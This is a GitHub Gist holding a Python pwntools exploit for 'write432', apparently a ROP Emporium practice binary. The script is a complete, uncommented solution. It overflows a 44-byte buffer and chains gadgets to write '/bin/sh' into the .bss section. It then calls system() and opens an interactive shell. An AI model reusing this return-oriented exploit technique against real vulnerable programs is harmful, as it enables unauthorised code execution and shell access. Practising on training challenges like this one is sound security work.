Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
write432
#!/usr/bin/env python
from pwn import *
context(os="linux", arch="i386")
def main():
conn = process('./write432')
system = 0x08048430
pop2ret = 0x080486da # pop edi; pop ebp; ret
mov_edi_ebp = 0x08048670 # mov DWORD PTR [edi],ebp
bss_addr = 0x0804a040 # buffer
# ROP Chain
payload = ''
payload += 'A' * 44
payload += p32(pop2ret)
payload += p32(bss_addr) # edi
payload += "/bin" # ebp
payload += p32(mov_edi_ebp)
payload += p32(pop2ret)
payload += p32(bss_addr + 4)
payload += "/sh\x00"
payload += p32(mov_edi_ebp)
payload += p32(system)
payload += "A" * 4 # padding
payload += p32(bss_addr)
print conn.recv(100)
conn.send(payload)
conn.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.